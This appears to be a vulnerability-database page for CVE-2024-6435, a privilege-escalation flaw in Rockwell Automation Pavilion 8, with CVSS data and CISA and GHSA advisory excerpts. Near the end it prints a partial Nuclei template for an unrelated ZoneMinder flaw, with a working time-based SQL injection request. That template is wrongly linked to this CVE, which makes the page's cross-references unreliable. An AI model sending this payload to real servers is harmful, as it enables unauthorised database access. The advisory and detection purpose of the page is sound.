CVE-2024-6435
published 2024-07-16CVE-2024-6435: A privilege escalation vulnerability exists in the affected products which could allow a malicious user with basic privileges to access functions which should…
PriorityP352high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
EPSS
0.49%
38.3th percentile
A privilege escalation vulnerability exists in the affected products which could allow a malicious user with basic privileges to access functions which should only be available to users with administrative level privileges. If exploited, an attacker could read sensitive data, and create users. For example, a malicious user with basic privileges could perform critical functions such as creating a user with elevated privileges and reading sensitive information in the “views” section.
Affected
12 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| rockwell_automation | pavilion8 | — | — |
| rockwell_automation | pavilion8 | — | — |
| rockwell_automation | pavilion8 | — | — |
| rockwell_automation | pavilion8 | — | — |
| rockwell_automation | pavilion8 | — | — |
| rockwell_automation | pavilion8 | — | — |
| rockwellautomation | pavilion8 | — | — |
| rockwellautomation | pavilion8 | — | — |
| rockwellautomation | pavilion8 | — | — |
| rockwellautomation | pavilion8 | — | — |
| rockwellautomation | pavilion8 | — | — |
| rockwellautomation | pavilion8 | — | — |
CVSS provenance
nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv4.08.7HIGHCVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
CISA ICS
Rockwell Automation Pavilion 8
cisa_ics·2024-07-16·CVSS 8.7
[HIGH] Rockwell Automation Pavilion 8
ICS Advisory
##
Rockwell Automation Pavilion 8
Release DateJuly 16, 2024
Alert CodeICSA-24-198-01
Related topics:
Industrial Control Systems, Industrial Control System Vulnerabilities
View CSAF
## 1. EXECUTIVE SUMMARY
- CVSS v4 8.7
- ATTENTION: Exploitable remotely/low attack complexity
- Vendor: Rockwell Automation
- Equipment: Pavilion 8
- Vulnerability: Incorrect Permission Assignment for Critical Resource
## 2. RISK EVALUATION
Successful exploitation of this vulnerability could allow an attacker to create new users and view sensitive data.
## 3. TECHNICAL DETAILS
## 3.1 AFFECTED PRODUCTS
The following versions of Rockwell Automation Pavilion 8, a Model Predictive Control (MPC) solution, are affected:
- Pavilion 8: Versions 5.15.00 through 5.20.0
GHSA
GHSA-55x8-qm73-mrfg: A privilege escalation vulnerability exists in the affected products which could allow a malicious user with basic privileges to access functions whic
ghsa_unreviewed·2024-07-16
CVE-2024-6435 [HIGH] CWE-732 GHSA-55x8-qm73-mrfg: A privilege escalation vulnerability exists in the affected products which could allow a malicious user with basic privileges to access functions whic
A privilege escalation vulnerability exists in the affected products which could allow a malicious user with basic privileges to access functions which should only be available to users with administrative level privileges. If exploited, an attacker could read sensitive data, and create users. For example, a malicious user with basic privileges could perform critical functions such as creating a user with elevated privileges and reading sensitive information in the “views” section.
No detection rules found.
Nuclei
ZoneMinder v1.37.* <= 1.37.64 - SQL Injection
nuclei·CVSS 9.9
CVE-2024-51482 [CRITICAL] ZoneMinder v1.37.* <= 1.37.64 - SQL Injection
ZoneMinder v1.37.* "
- "ZoneMinder Login"
- "ZoneMinder"
condition: or
internal: true
- raw:
- |
POST /zm?view=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=login&postLoginQuery=&username={{username}}&password={{password}}
- |
GET /zm/index.php?view=request&request=event&action=removetag&tid=1 HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body, "{\"result\":\"OK")'
internal: true
- raw:
- |
@timeout: 30s
GET /zm/index.php?view=request&request=event&action=removetag&tid=1+AND+(SELECT+6435+FROM+(SELECT(SLEEP(7)))AbUy) HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'duration>=7'
- 'status_code == 200'
condition: and
# digest: 4a0a0047304502204493ef9214470f6e36da739698b609a078c41ed60e7739ed8df186505a8536c1022100b12
No writeups or analysis indexed.
2024-07-16
Published